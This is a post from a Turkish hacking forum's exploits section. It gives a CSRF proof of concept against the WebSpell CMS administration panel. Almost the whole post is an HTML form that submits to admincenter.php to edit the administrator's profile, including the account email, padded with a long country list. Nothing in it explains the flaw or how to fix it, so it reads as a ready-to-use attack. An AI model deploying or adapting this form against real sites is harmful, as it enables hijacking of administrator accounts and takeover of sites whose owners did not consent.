ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> WebSpell ~ CSRF Vuln.
WebSpell ~ CSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/Jonturk75
Date :
14.07.2012 03:51:27
#
WebSpell ~ CSRF Vuln.
[Full Screen Display]
------------------- header data start ------------------- > ############################################################# # Application Name : WebSpell # Vulnerable Type : CSRF # Demo : http://demo.opensourcecms.com/webspell/admin # Author : Jonturk75 ############################################################# < ------------------- header data end of ------------------- > <form method=post enctype=multipart/form-data action=/admincenter.php?site=users&page=1&type=ASC&sort=nickname> <input type=text name=nickname value=admin size=60 /></td> <input type=text name=email value=oscms@opensourcecms.com size=60 /> <input name=avatar type=file size=40 /> <input type=checkbox name=avatar value=1 /> <input name=userpic type=file size=40 /> <input type=checkbox name=userpic value=1 /> <input type=text name=firstname value= size=60 /> <input type=text name=lastname value= size=60 /> <input type=text name=b_day value=01 size=2 /> <input type=text name=b_month value=01 size=2 /> <input type=text name=b_year value=1970 size=4 /> <select name=sex><option value=m>male</option><option value=f>female</option><option value=u selected=selected>not available</option></select> <select name=flag><option value=al>Albania</option><option value=dz>Algeria</option><option value=as>American Samoa</option> <option value=ad>Andorra</option><option value=ao>Angola</option><option value=ai>Anguilla</option><option value=aq>Antarctica</option> <option value=ag>Antigua and Barbuda</option><option value=ar>Argentina</option><option value=am>Armenia</option><option value=aw>Aruba</option> <option value=au>Australia</option><option value=at>Austria</option><option value=az>Azerbaijan</option><option value=bz>Bahamas</option> <option value=bh>Bahrain</option><option value=bd>Bangladesh</option><option value=bb>Barbados</option><option value=by>Belarus</option> <option value=be>Belgium</option><option value=bx>Benelux</option><option value=bj>Benin</option><option value=bm>Bermuda</option> <option value=bt>Bhutan</option><option value=bo>Bolivia</option><option value=ba>Bosnia Herzegowina</option><option value=bw>Botswana</option> <option value=bv>Bouvet Island</option><option value=br>Brazil</option><option value=io>British Indian Ocean Territory</option> <option value=bn>Brunei Darussalam</option><option value=bg>Bulgaria</option><option value=bf>Burkina Faso</option><option value=bi>Burundi</option> <option value=kh>Cambodia</option><option value=cm>Cameroon</option><option value=ca>Canada</option><option value=cv>Cape Verde</option> <option value=ky>Cayman Islands</option><option value=cf>Central African Republic</option><option value=cl>Chile</option><option value=cn>China</option> <option value=cx>Christmas Island</option><option value=cc>Cocos Islands</option><option value=co>Colombia</option><option value=km>Comoros</option> <option value=cg>Congo</option><option value=ck>Cook Islands</option><option value=cr>Costa Rica</option><option value=ci>Cote d’Ivoire</option> <option value=hr>Croatia</option><option value=cu>Cuba</option><option value=cy>Cyprus</option><option value=cz>Czech Republic</option> <option value=cd>Democratic Congo</option><option value=kp>Democratic Korea</option><option value=dk>Denmark</option><option value=dj>Djibouti</option> <option value=dm>Dominica</option><option value=do>Dominican Republic</option><option value=tp>East Timor</option><option value=ec>Ecuador</option> <option value=eg>Egypt</option><option value=sv>El Salvador</option><option value=en>England</option><option value=er>Eritrea</option> <option value=ee>Estonia</option><option value=et>Ethiopia</option><option value=eu>European Union</option><option value=fk>Falkland Islands</option> <option value=fo>Faroe Islands</option><option value=fj>Fiji</option><option value=fi>Finland</option><option value=fr>France</option> <option value=pf>French Polynesia</option><option value=tf>French Southern Territories</option><option value=ga>Gabon</option><option value=gm>Gambia</option> <option value=ge>Georgia</option><option value=de>Germany</option><option value=gh>Ghana</option><option value=gi>Gibraltar</option> <option value=gr>Greece</option><option value=gl>Greenland</option><option value=gd>Grenada</option><option value=gp>Guadeloupe</option><option value=gu>Guam</option><option value=gt>Guatemala</option><option value=gn>Guinea</option><option value=gw>Guinea-Bissau</option><option value=gy>Guyana</option><option value=ht>Haiti</option><option value=hm>Heard Islands</option><option value=va>Holy See</option><option value=hn>Honduras</option><option value=hk>Hong Kong</option><option value=hu>Hungary</option><option value=is>Iceland</option><option value=in>India</option><option value=id>Indonesia</option><option value=ir>Iran</option><option value=iq>Iraq</option><option value=ie>Ireland</option><option value=il>Israel</option><option value=it>Italy</option><option value=jm>Jamaica</option><option value=jp>Japan</option><option value=jo>Jordan</option><option value=kz>Kazakhstan</option><option value=ke>Kenia</option><option value=ki>Kiribati</option><option value=kr>Korea</option><option value=kw>Kuwait</option><option value=kg>Kyrgyzstan</option><option value=la>Lao People’s</option><option value=lv>Latvia</option><option value=lb>Lebanon</option><option value=ls>Lesotho</option><option value=lr>Liberia</option><option value=ly>Libyan Arab Jamahiriya</option><option value=li>Liechtenstein</option><option value=lt>Lithuania</option><option value=lu>Luxemburg</option><option value=mo>Macau</option><option value=mk>Macedonia</option><option value=mg>Madagascar</option><option value=mw>Malawi</option><option value=my>Malaysia</option><option value=mv>Maldives</option><option value=ml>Mali</option><option value=mt>Malta</option><option value=mh>Marshall Islands</option><option value=mr>Mauritania</option><option value=mu>Mauritius</option><option value=mx>Mexico</option><option value=fm>Micronesia</option><option value=md>Moldova</option><option value=mc>Monaco</option><option value=mn>Mongolia</option><option value=ms>Montserrat</option><option value=ma>Morocco</option><option value=mz>Mozambique</option><option value=mm>Myanmar</option><option value=nb>Namibia</option><option value=nr>Nauru</option><option value=np>Nepal</option><option value=nl>Netherlands</option><option value=an>Netherlands Antilles</option><option value=nc>New Caledonia</option><option value=nz>New Zealand</option><option value=ni>Nicaragua</option><option value=ng>Nigeria</option><option value=nu>Niue</option><option value=nf>Norfolk Island</option><option value=nx>Northern Ireland</option><option value=mp>Northern Mariana Islands</option><option value=no>Norway</option><option value=om>Oman</option><option value=pk>Pakistan</option><option value=pw>Palau</option><option value=ps>Palestinian</option><option value=pa>Panama</option><option value=pg>Papua New Guinea</option><option value=py>Paraguay</option><option value=pe>Peru</option><option value=ph>Philippines</option><option value=pn>Pitcairn</option><option value=pl>Poland</option><option value=pt>Portugal</option><option value=pr>Puerto Rico</option><option value=qa>Qatar</option><option value=re>Reunion</option><option value=ro>Romania</option><option value=ru>Russian Federation</option><option value=rw>Rwanda</option><option value=sh>Saint Helena</option><option value=kn>Saint Kitts and Nevis</option><option value=lc>Saint Lucia</option><option value=pm>Saint Pierre and Miquelon</option><option value=vc>Saint Vincent</option><option value=ws>Samoa</option><option value=sm>San Marino</option><option value=st>Sao Tome and Principe</option><option value=sa>Saudi Arabia</option><option value=sc>Scotland</option><option value=sn>Senegal</option><option value=sl>Sierra Leone</option><option value=sg>Singapore</option><option value=sk>Slovak Republic</option><option value=si>Slovenia</option><option value=sb>Solomon Islands</option><option value=so>Somalia</option><option value=za>South Africa</option><option value=gs>South Georgia</option><option value=es>Spain</option><option value=lk>Sri Lanka</option><option value=sd>Sudan</option><option value=sr>Suriname</option><option value=sj>Svalbard and Jan Mayen</option><option value=sz>Swaziland</option><option value=se>Sweden</option><option value=ch>Switzerland</option><option value=sy>Syria</option><option value=tw>Taiwan</option><option value=tj>Tajikistan</option><option value=tz>Tanzania</option><option value=th>Thailand</option><option value=ti>Tibet</option><option value=tg>Togo</option><option value=tk>Tokelau</option><option value=to>Tonga</option><option value=tt>Trinidad and Tobago</option><option value=tn>Tunisia</option><option value=tr>Turkey</option><option value=tm>Turkmenistan</option><option value=tc>Turks_and Caicos Islands</option><option value=tv>Tuvalu</option><option value=ug>Uganda</option><option value=ua>Ukraine</option><option value=ae>United Arab Emirates</option><option value=uk>United Kingdom</option><option value=uy>Uruguay</option><option value=us>USA</option><option value=uz>Uzbekistan</option><option value=vu>Vanuatu</option><option value=ve>Venezuela</option><option value=vn>Vietnam</option><option value=vg>Virgin Islands (British)</option><option value=vi>Virgin Islands (USA)</option><option value=wa>Wales</option><option value=wf>Wallis and Futuna</option><option value=eh>Western Sahara</option><option value=ye>Yemen</option><option value=yu>Yugoslavia</option><option value=zm>Zambia</option><option value=zw>Zimbabwe</option></select></td> <input type=text name=town value= size=60 /> <input type=text name=icq value= size=60 /> <input type=text name=homepage value= size=60 /> <textarea name=usertext rows=5 cols= style=width: 60%;></textarea> <textarea name=about rows=5 cols= style=width: 60%;></textarea> <input type=text name=clantag value= size=60 /> <input type=text name=clanname value= size=60 /> <input type=text name=clanhp value= size=60 /> <input type=text name=clanirc value= size=60 /> <input type=text name=clanhistory value= size=60 /> <input type=text name=cpu value= size=60 /> <input type=text name=mainboard value= size=60 /> <input type=text name=ram value= size=60 /> <input type=text name=monitor value= size=60 /> <input type=text name=graphiccard value= size=60 /> <input type=text name=soundcard value= size=60 /> <input type=text name=connection value= size=60 /> <input type=text name=keyboard value= size=60 /> <input type=text name=mouse value= size=60 /> <input type=text name=mousepad value= size=60 /> <input type=hidden name=captcha_hash value=36888645a34d11c405b7546b4e197310 /><input type=hidden name=id value=1 /> <input type=submit name=edit value=edit Profile /> </form> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
